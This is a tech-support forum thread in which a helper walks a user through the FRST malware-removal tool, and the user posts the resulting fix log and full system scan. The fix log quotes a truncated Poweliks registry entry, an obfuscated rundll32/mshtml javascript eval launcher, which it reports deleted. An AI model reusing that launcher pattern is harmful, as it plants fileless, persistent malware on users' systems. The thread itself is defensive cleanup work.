Step 1

Please download this attached Attached File  fixlist.txt   269bytes   1 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#7 morris79

morris79
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:10:46 AM

Posted 11 September 2014 - 12:48 PM

here is the fixlog.txt

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 10-09-2014
Ran by Paul at 2014-09-11 12:02:11 Run:1
Running from E:\
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-296848781-3995833910-2275520707-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
EmptyTemp:
*****************
 
Processes closed successfully.
"HKU\S-1-5-21-296848781-3995833910-2275520707-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-296848781-3995833910-2275520707-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
EmptyTemp: => Removed 183.5 MB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====

Here is the FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-09-2014
Ran by Paul (administrator) on PAUL-DELL2 on 11-09-2014 12:36:59
Running from E:\
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
() C:\Program Files\Dell\DW WLAN Card\WLTRYSVC.EXE
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\BCMWLTRY.EXE
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft\BingBar\SeaPort.EXE
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Yahoo! Inc.) C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\WLTRAY.EXE
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe
(Sun Microsystems, Inc.) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
(Brother Industries, Ltd.) C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe
(Brother Industries, Ltd.) C:\Program Files\Brother\ControlCenter3\BrccMCtl.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Carbonite, Inc.) C:\Program Files\Carbonite\Carbonite Backup\CarboniteUI.exe
(Brother Industries, Ltd.) C:\Program Files\Brother\Brmfcmon\BrMfcMon.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(McAfee, Inc.) C:\Program Files\McAfee Online Backup\MOBKbackup.exe
(McAfee, Inc.) C:\Program Files\McAfee Online Backup\MOBKbackup.exe
(McAfee, Inc.) C:\Program Files\McAfee\VirusScan\McVsShld.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [283160 2010-11-06] (Intel Corporation)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Program Files\Dell\DW WLAN Card\WLTRAY.exe [4685824 2014-08-12] (Dell Inc.)
HKLM\...\Run: [RemoteControl9] => C:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2009-07-06] (CyberLink Corp.)
HKLM\...\Run: [PDVD9LanguageShortcut] => C:\Program Files\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-04-29] (CyberLink Corp.)
HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [514832 2014-07-09] (McAfee, Inc.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254696 2012-01-18] (Sun Microsystems, Inc.)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [496768 2014-07-07] (McAfee, Inc.)
HKLM\...\Run: [BrMfcWnd] => C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe [745472 2009-02-10] (Brother Industries, Ltd.)
HKLM\...\Run: [ControlCenter3] => C:\Program Files\Brother\ControlCenter3\brctrcen.exe [77824 2007-10-30] (Brother Industries, Ltd.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1314816 2011-02-24] (Analog Devices, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [Carbonite Backup] => C:\Program Files\Carbonite\Carbonite Backup\CarboniteUI.exe [1056976 2014-06-27] (Carbonite, Inc.)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.)
Lsa: [Authentication Packages] msv1_0 wvauth
ShellIconOverlayIdentifiers: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: EnabledUnlockedFDEIconOverlay -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: MOBK -> {3c3f3c1a-9153-7c05-f938-622e7003894d} => C:\Program Files\McAfee Online Backup\MOBKshell.dll (McAfee, Inc.)
ShellIconOverlayIdentifiers: MOBK2 -> {e6ea1d7d-144e-b977-98c4-84c53c1a69d0} => C:\Program Files\McAfee Online Backup\MOBKshell.dll (McAfee, Inc.)
ShellIconOverlayIdentifiers: MOBK3 -> {b4caf489-1eec-c617-49ad-8d7088598c06} => C:\Program Files\McAfee Online Backup\MOBKshell.dll (McAfee, Inc.)
ShellIconOverlayIdentifiers: UninitializedFdeIconOverlay -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/?ilc=17
URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - DefaultScope {9A33AEE9-913F-4341-A6FC-C2D905CBBAFD} URL = https://search.yahoo.com/search?fr=mcafee&type=B011US0D20140115&p={SearchTerms}
SearchScopes: HKCU - {24C98B7C-CC90-44D6-93C0-509B4F6EE9F1} URL = http://search.yahoo.com/search?p={searchTerms}&fr=chr-ydwnld
SearchScopes: HKCU - {9A33AEE9-913F-4341-A6FC-C2D905CBBAFD} URL = https://search.yahoo.com/search?fr=mcafee&type=B011US0D20140115&p={SearchTerms}
BHO: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
BHO: No Name -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} ->  No File
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll (Yahoo! Inc)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Toolbar: HKLM - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} -  No File
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.169.12 192.168.169.17
Tcpip\..\Interfaces\{BAB2BA9C-F1CF-414A-A0DE-EA9AD3591E6F}: [NameServer] 8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{BC0EE8A6-7D0A-4656-BE50-121CC3D7E979}: [NameServer] 8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_35 -> C:\Windows\system32\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Paul\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Paul\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2011-10-09]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2011-10-09]
 
Chrome: 
=======
CHR HomePage: Default -> 3357E1BEFC300C15D3BF6D18FED3301ECAB36BA5F675502CDB29D95C359F7FDF
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR DefaultSearchKeyword: Default -> 8B60D145D244B1DDDC05717A0FC300304FABC72D5B78AFB8AB2177911DC975AC
CHR DefaultSearchURL: Default -> 7BB08588A889EEDE7ACD718C2B49107452B46F50AEDB748C076B5C5F9C1019EF
CHR Plugin: (Shockwave Flash) - C:\Users\Paul\AppData\Local\Google\Chrome\Application\37.0.2062.120\gcswf32.dll No File
CHR Plugin: (Java Deployment Toolkit 6.0.240.7) - C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll No File
CHR Plugin: (Java™ Platform SE 6 U24) - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Users\Paul\AppData\Local\Google\Chrome\Application\37.0.2062.120\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Users\Paul\AppData\Local\Google\Chrome\Application\37.0.2062.120\pdf.dll ()
CHR Plugin: (Windows Live Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Users\Paul\AppData\Local\Google\Update\1.3.21.69\npGoogleUpdate3.dll No File
CHR Plugin: (Default Plug-in) - default_plugin No File
CHR CustomProfile: C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-10]
CHR Extension: (SiteAdvisor) - C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2012-03-09]
CHR Extension: (Skype Click to Call) - C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2012-03-09]
CHR Extension: (Google Wallet) - C:\Users\Paul\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-09-10]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2014-09-06]
CHR HKLM\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2011-10-18]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 CarboniteService; C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe [5058256 2014-06-27] (Carbonite, Inc. (www.carbonite.com))
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [179592 2012-01-17] ()
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
R2 McAfee SiteAdvisor Service; C:\Program Files\Common Files\Mcafee\McSvcHost\McSvHost.exe [167784 2012-08-31] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [527168 2014-07-09] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [471560 2014-07-03] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-03-18] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-05-02] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [179600 2014-05-02] (McAfee, Inc.)
R2 MOBKbackup; C:\Program Files\McAfee Online Backup\MOBKbackup.exe [229688 2010-04-13] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [286672 2014-05-13] (McAfee, Inc.)
S3 SecureStorageService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Secure Storage Manager\SecureStorageService.exe [1517448 2011-11-11] (Wave Systems Corp.)
S2 tcsd_win32.exe; C:\Program Files\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1637888 2011-10-08] () [File not signed]
R2 TdmService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe [2864496 2011-12-08] (Wave Systems Corp.)
R2 wltrysvc; C:\Program Files\Dell\DW WLAN Card\bcmwltry.exe [4038656 2014-08-12] (Dell Inc.) [File not signed]
S3 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [145408 2012-01-16] (Wave Systems Corp.) [File not signed]
S2 0119271410453457mcinstcleanup; C:\Windows\TEMP\011927~1.EXE -cleanup -nolog [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 BCM42RLY; C:\Windows\System32\drivers\BCM42RLY.sys [18424 2014-08-12] (Broadcom Corporation)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [61400 2014-05-02] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [134600 2014-05-02] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [236672 2014-05-02] (McAfee, Inc.)
S3 mfebopk; C:\Windows\System32\drivers\mfebopk.sys [66408 2014-05-02] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [367776 2014-05-02] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [574576 2014-05-02] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [345584 2014-03-18] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [81264 2014-03-18] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [215624 2014-05-02] (McAfee, Inc.)
R1 MOBKFilter; C:\Windows\System32\DRIVERS\MOBK.sys [54776 2010-04-13] (Mozy, Inc.)
S3 NAL; C:\Windows\system32\Drivers\iqvw32.sys [30880 2010-02-03] (Intel Corporation )
S3 netvsc; C:\Windows\System32\DRIVERS\netvsc60.sys [126464 2010-11-20] (Microsoft Corporation)
R0 PBADRV; C:\Windows\System32\DRIVERS\PBADRV.sys [26608 2012-09-12] (Dell Inc)
S3 SynthVid; C:\Windows\System32\DRIVERS\VMBusVideoM.sys [19456 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\Paul\AppData\Local\Temp\catchme.sys [X]
S3 mfefirek46; \Device\mfefirek46.sys [X]
S3 mfefirek50; \Device\mfefirek50.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-11 12:27 - 2014-09-11 12:28 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 9.5
2014-09-11 11:12 - 2014-09-11 11:12 - 00053903 _____ () C:\ComboFix.txt
2014-09-11 10:01 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-11 10:01 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-11 10:01 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-11 10:01 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-11 09:57 - 2014-09-11 09:41 - 05576769 ____R (Swearware) C:\Users\Paul\Desktop\ComboFix.exe
2014-09-11 09:49 - 2014-09-11 11:12 - 00000000 ____D () C:\Qoobox
2014-09-11 09:45 - 2014-09-11 11:10 - 00000000 ____D () C:\Windows\erdnt
2014-09-10 14:20 - 2014-09-11 12:37 - 00000000 ____D () C:\FRST
2014-09-10 13:43 - 2014-09-11 12:27 - 00001484 _____ () C:\Windows\PFRO.log
2014-09-10 13:38 - 2014-08-19 12:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-10 13:38 - 2014-08-18 17:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-10 13:38 - 2014-08-18 17:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-10 13:38 - 2014-08-18 16:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-10 13:38 - 2014-08-18 16:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-10 13:38 - 2014-08-18 16:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-10 13:38 - 2014-08-18 16:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-10 13:38 - 2014-08-18 16:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-10 13:38 - 2014-08-18 16:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-10 13:38 - 2014-08-18 16:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-10 13:38 - 2014-08-18 16:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-10 13:38 - 2014-08-18 16:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-10 13:38 - 2014-08-18 16:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-10 13:38 - 2014-08-18 16:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-10 13:38 - 2014-08-18 16:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-10 13:38 - 2014-08-18 16:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-10 13:38 - 2014-08-18 16:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-10 13:38 - 2014-08-18 16:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-10 13:38 - 2014-08-18 16:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-10 13:38 - 2014-08-18 16:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-10 13:38 - 2014-08-18 16:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
